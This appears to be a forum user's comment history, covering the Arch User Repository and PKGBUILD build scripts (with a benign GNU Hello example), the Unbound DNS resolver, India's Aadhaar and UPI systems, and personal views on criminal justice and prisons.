Their entire approach and mindset leaves users vulnerable.
Genuinely interested to know more about why you think that. I've used Arch for about 20 years so I'm probably unconsciously a fanboi, but pacman is the approach to package management that I've hated least of all I've tried, so I stayed there.
The 'pain' here is that Arch wanted to provide a way for users to manage 'ad hoc' packages within the pacman system and make them available to other users if necessary. For reference I can find examples of only 4 other linux distros that support an equivalent:
As GP says Arch may need a rethink of how AUR is accessed and used, but I think it's idiotic to paint Arch as a whole in a negative light for a niche user contribution add-on that is totally separate to their official package line.
What we don't trust are user repositories, where anons like you and me can publish a binary.
Great point supporting the wrong argument. AUR does NOT host binaries - there is NO WAY for anon to make a binary available directly to Arch users. Let's all get this clear.
What is the AUR?
The AUR (Arch User Repository) is a community-driven repository of build scripts called PKGBUILDs. It doesn't host packages themselves — it hosts recipes that tell your system how to fetch sources and compile/package software locally.
What it hosts: PKGBUILDs for software not in the official repos — proprietary apps (Spotify, Chrome), bleeding-edge or -git versions, niche tools, and packages awaiting promotion to official repos. The scripts are user-submitted and unvetted, so you should read a PKGBUILD before building.
What's a PKGBUILD?
Typical basic example:
# Maintainer: Your Name <you@example.com>
pkgname=hello
pkgver=2.12.1
pkgrel=1
pkgdesc="GNU Hello, a program that prints a friendly greeting"
arch=('x86_64')
url="https://www.gnu.org/software/hello/"
license=('GPL-3.0-or-later')
depends=('glibc')
makedepends=('gcc')
source=("https://ftp.gnu.org/gnu/hello/hello-${pkgver}.tar.gz")
sha256sums=('SKIP') # replace with real checksum, or use updpkgsums
build() {
cd "$srcdir/$pkgname-$pkgver"./configure --prefix=/usr
make
}
package() {
cd "$srcdir/$pkgname-$pkgver"
make DESTDIR="$pkgdir" install
}
The entire POINT of AUR is that anyone can add a script for something they find useful. It can then be voted on by members for consideration to move into an official repo. From the above it's pretty clear that the onus for security and reviewing code is ENTIRELY on the user, and it's almost impossible to imagine that a compromised build script would just pick up votes and make it to a repo.
So in summary AUR is exactly like your Gentoo compile scripts.
Unbound: Unbound is a validating, recursive, caching DNS resolver. The main reason people run it is recursion: instead of forwarding your queries to an upstream like 1.1.1.1 or 8.8.8.8, Unbound walks the hierarchy itself — root servers, then TLD servers, then the authoritative server for the domain. The payoff is that no single third party ever sees your full query stream, and you're not trusting a public resolver's logging or filtering policies. It also does DNSSEC validation (cryptographically verifying answers weren't tampered with) and caches results locally for speed.
Come on, one of the big draws of Linux is how easy it is to install and update your software.
yeah and if you've ever used pacman that is 100% true. We aren't talking about pacman here.
"Oh we never said it wasn't going to fuck your system up with malware" deserves a Powny prize.
AUR is explicitly a repo for user contributions. There is no signing, vetting, or anything - anyone who can read already knows this. Again you seem to be mixing up official Arch packages from official repos via pacman, versus building whatever shit I throw together in AUR with yay. Absolutely not the same thing.
Yes functionally it is really good but, much like the Aadhaar biometric ID system, the direction of travel is that it becomes so ubiquitous you are more or less forced to use it.
In a country where you actually have things like rule of law, separation of powers, freedom of speech and assembly, this might be ok. But both Aadhaar and UPI are moving towards 'data maximization' and user profiling at govt/state level, with your spending and service utilization data being shared with an opaque group of favored providers.
the compromise did not affect vault or customer data
from the article - "This targeting is unusually specific. In addition to standard developer secrets such as
Definitely - a lot of people doing 'bad' things are broken in some way, had difficult/abusive childhoods etc etc. Not minimizing that at all, and it's something we have to work on as a society.
But what we're each saying isn't mutually exclusive - a person's background is obviously relevant to why they ended up in court. But the point is - they still did something horrible. I saw on multiple occasions, people not going to jail for awful crimes because their lawyer told Court what a difficult upbringing they had - and then that person going on to do something horrible to vulnerable people. Actually meeting a few of those victims and talking about their confusion/amazement that the perp was allowed to come back and beat/rape them really changed my worldview on all this.
I'm politically on the 'left' but I think you're dead wrong about this.
In a previous career I spent LOTS of time talking to criminals of all stripes, from shoplifters to serial killers. I went into that job thinking more or less the same as your above post; I came out of it many years later thinking the exact opposite. There's definitely inequality in terms of who gets sent to jail, but what I learned (n=1, this is just my opinion) is that we need prisons, and prisons don't have to be about education, reform, whatever - they can just be about punishment and that's fine.
"Don't drop acid, take it pass-fail!" -- Bryan Michael Wendt
